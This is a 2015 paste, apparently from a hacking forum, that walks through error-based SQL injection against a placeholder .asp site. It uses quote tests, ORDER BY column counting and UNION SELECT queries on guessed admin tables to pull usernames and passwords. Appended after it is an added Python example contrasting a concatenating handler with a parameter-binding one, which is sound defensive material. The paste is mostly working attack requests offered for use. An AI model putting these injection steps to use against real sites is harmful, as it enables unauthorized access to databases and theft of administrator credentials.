Kyfx

THE BASIC ERROR-BASED MSSQL Injection

Jul 18th, 2015
The site is vulnerable and runs on .asp.
So assume that you have a site with the name of
Code:

http://www.target.com/
Now find a page where the site is vulnerable to SQL injection.
You can check for the vulnerability by adding a single quotation mark (')
at the end of the URL, like
Code:

http://www.target.com/product.asp?id=13'

If you get this error:

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.
/deptdet.asp, line 122
then this means the site is vulnerable to SQL injection.
Now we are going to find the number of columns.
Normally we use -- at the end of the string, but in this case we will be using #
Code:

http://www.target.com/product.asp?id=13 order by 1#
Suppose that the site has 10 columns. When you use the query "order by 1#" (without the double quotation marks)
you will not get any error and the page will load normally. But when you use the query "order by 11#" (without the double quotation marks) you will get an error, which means that the site has 10 columns.
So we will have an error on this query:
Code:

http://www.target.com/product.asp?id=13 order by 11#
But when we use this query, we will not get any error.
Code:

http://www.target.com/product.asp?id=13 order by 10#
This tells us that the table has 10 columns.
If this is not working, use the string:
Code:

http://www.target.com/product.asp?' and 1=2 ORDER BY 10--
or

http://www.target.com/product.asp?' and 1=2 ORDER BY 10#
This should work :)
Now we will write the query as:
Code:

http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#
So in the next step we need the name of a table in order to get the number of the target's visible column.
Let me explain a bit. In simple SQL injection we use
Code:

union select 1,2,3,4,5,6 --
and we get a number that we use to get information from the site. In this case we need a table name to get that number of the visible column,
so to get that number we are going to add the name of a table after union select 1,2,3,4,5,6,7, ..,10
In this case, scripts for getting table names don't work most of the time (I tried some of them), so we will add table names manually. Common table names are "admin, tbladmin, tbl_admin, user, users, login, info, email" etc. Suppose the site has an admin table that is visible. Now our URL will look like
Code:

http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#
After this we will get the number of the largest visible column, which we can use to get data from the site. Suppose columns 3, 7 and 6 are visible.
So now we are going to use 3 to get information. All we have to do is put the name of a column in place of 3 in the string and we will get the username and password.
Now our URL will look like
Code:

http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#
Suppose we got a username instead of the number 3.
Then replace the column name with the passwords column name
and you will get the password ;)
The URL will be like
Code:

http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
Do manual SQLi and you will be the best
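
Why the requests above get answers, and what stops them, as an added example that is not part of the original paste: a handler that concatenates id into the SQL text and echoes driver errors, beside one that validates and binds the value. It assumes SQLite in memory as a stand-in for the Access/MSSQL back end; the table layout, the function names and the sample rows are constructed, and the trailing # is dropped because SQLite does not treat it as a comment.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, title TEXT, price TEXT);
        INSERT INTO products VALUES (13, 'Widget', '9.99');
        CREATE TABLE admin (name TEXT, passwords TEXT);
        INSERT INTO admin VALUES ('root', 'constructed-secret');
    """)
    return db

def product_vulnerable(db, raw_id):
    """'Before': id is pasted into the SQL text and driver errors are echoed."""
    sql = "SELECT id, title, price FROM products WHERE id = " + raw_id
    try:
        return 200, db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, str(exc)  # the syntax error reaches the client

def product_hardened(db, raw_id):
    """'After': validate the type, bind the value, return a generic error."""
    if not (raw_id.isascii() and raw_id.isdigit()) or len(raw_id) > 9:
        return 400, "invalid id"
    try:
        rows = db.execute(
            "SELECT id, title, price FROM products WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        return 500, "internal error"  # details belong in the server log only
    return 200, rows

# The page's three request shapes; the column count is adjusted to this table.
PROBES = ["13'", "13 order by 4", "13 union select 1,name,passwords from admin"]

def compare(db):
    """Run every probe through both handlers and return the paired results."""
    return [(p, product_vulnerable(db, p), product_hardened(db, p)) for p in PROBES]

if __name__ == "__main__":
    for probe, before, after in compare(make_db()):
        print(f"{probe!r}\n  vulnerable: {before}\n  hardened:   {after}")
```

With the bound parameter the value never becomes part of the SQL text, and with the generic error body the quote test and the order by test return nothing that distinguishes one probe from another.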